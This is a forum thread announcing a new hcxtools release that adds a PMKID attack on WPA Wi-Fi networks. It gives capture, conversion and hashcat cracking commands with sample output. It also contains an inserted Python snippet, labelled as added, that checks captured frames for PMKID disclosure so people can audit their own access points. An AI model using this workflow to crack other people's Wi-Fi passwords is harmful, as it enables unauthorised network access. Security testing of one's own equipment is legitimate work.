hcxtools - solution for capturing wlan traffic and conversion to hashcat formats
(07-25-2018, 08:44 PM)ZerBea Wrote: Small update on hcxdumptool and hcxtools: moved to v 4.2.0 rc1:
Added a completely new WPA attack mode according to the new hashcat hashmodes 16800 and 16801. The attack is performed on the RSN IE (Robust Security Network Information Element) of an EAPOL 1/4 frame.
At this moment we do not know on which vendors and on how many routers this will work. Please test it...
Also hcxdumptool isn't ready for a 100% attack - I'm working on it.

$ hcxpcaptool -h
-z <file> : output PMKID file (hashcat hashmode -m 16800)
-Z <file> : output PMKID file (hashcat hashmode -m 16801)

Advantage:
only 2 packets required
1 associationrequest/reassociationrequest (proberesponse is ok, too)
2 EAPOL 1/4 (M1) with included RSN IE

Remember ap-less attack:
only 2 packets required
1 associationrequest/reassociationrequest (proberequest is ok, too)
2 EAPOL 2/4 (M2) as response to hcxdumptool

Just use hcxdumptool to capture, hcxpcaptool to convert and hashcat to crack

hcxtools update: 4.2.0 rc1
added new attack mode on WPA PMKID

$ hcxpcaptool -z hashfile.16800 pmkidassociationrequest.pcapng
start reading from pmkidassociationrequest.pcapng
summary:                                        
file name....................: pmkidassociationrequest.pcapng
file type....................: pcapng 1.0
file hardware information....: unknown
file os information..........: unknown
file application information.: unknown
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 3
skipped packets..............: 0
packets with FCS.............: 0
association requests.........: 1
association responses........: 1
EAPOL packets................: 1
EAPOL PMKIDs.................: 1

1 PMKID(s) written to hashfile.16800

$ hashcat -m 16800 hashfile.16800 wordlist

example hashes are here:
https://hashcat.net/wiki/doku.php?id=example_hashes



Hashcat -m 16800?????? where?
Unknown hash-type '16800' selected
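For anyone auditing their own access points in response to the "which vendors and how many routers" question in the post above, this added example (not part of the original posts and not hcxtools code) checks whether a captured EAPOL-Key message 1/4 actually carries a PMKID. It assumes the standard IEEE 802.11 EAPOL-Key layout (4-byte EAPOL header, 95-byte fixed key body, then key data) and the PMKID element encoding tag 0xdd, OUI 00-0F-AC, type 4; `m1_discloses_pmkid` and `build_m1` are hypothetical names, and the frames are constructed test data.

```python
import struct

# PMKID key data element: tag 0xdd, length 20, OUI 00-0F-AC, data type 4.
PMKID_SELECTOR = bytes.fromhex("000fac04")
PAIRWISE, KEY_ACK, KEY_MIC = 0x0008, 0x0080, 0x0100  # Key Information bits


def m1_discloses_pmkid(eapol: bytes) -> bool:
    """True if an EAPOL-Key message 1/4 carries a non-zero PMKID."""
    # 4-byte EAPOL header + 95-byte fixed EAPOL-Key body precede the key data.
    if len(eapol) < 99 or eapol[1] != 3 or eapol[4] != 2:
        return False  # not an EAPOL-Key frame with the RSN descriptor
    (key_info,) = struct.unpack_from(">H", eapol, 5)
    # M1 comes from the AP: pairwise and ack bits set, no MIC yet.
    if not (key_info & PAIRWISE and key_info & KEY_ACK) or key_info & KEY_MIC:
        return False
    (data_len,) = struct.unpack_from(">H", eapol, 97)
    data = eapol[99:99 + data_len]
    if len(data) != data_len:
        return False  # truncated capture
    pos = 0
    while pos + 2 <= len(data):  # walk the tag/length/value elements
        tag, length = data[pos], data[pos + 1]
        body = data[pos + 2:pos + 2 + length]
        if len(body) != length:
            return False  # element runs past the end of the key data
        if tag == 0xDD and length == 20 and body[:4] == PMKID_SELECTOR:
            return any(body[4:])  # an all-zero PMKID discloses nothing
        pos += 2 + length
    return False


def build_m1(key_data: bytes, key_info: int = 0x008A) -> bytes:
    """Constructed test frame: zeroed nonce and counters, given key data."""
    body = struct.pack(">BHH", 2, key_info, 16) + bytes(88)
    body += struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body


if __name__ == "__main__":
    kde = b"\xdd\x14" + PMKID_SELECTOR + bytes(range(1, 17))  # constructed
    zeroed = b"\xdd\x14" + PMKID_SELECTOR + bytes(16)
    for name, frame in [("PMKID present", build_m1(kde)),
                        ("no key data", build_m1(b"")),
                        ("zeroed PMKID", build_m1(zeroed))]:
        verdict = "disclosed" if m1_discloses_pmkid(frame) else "not disclosed"
        print(f"{name}: PMKID {verdict} in M1")
```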


Messages In This Thread
wlandump-ng vs hcxdumptool - by hulley - 02-10-2018, 10:26 PM
RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - by strike1953 - 07-25-2018, 10:40 PM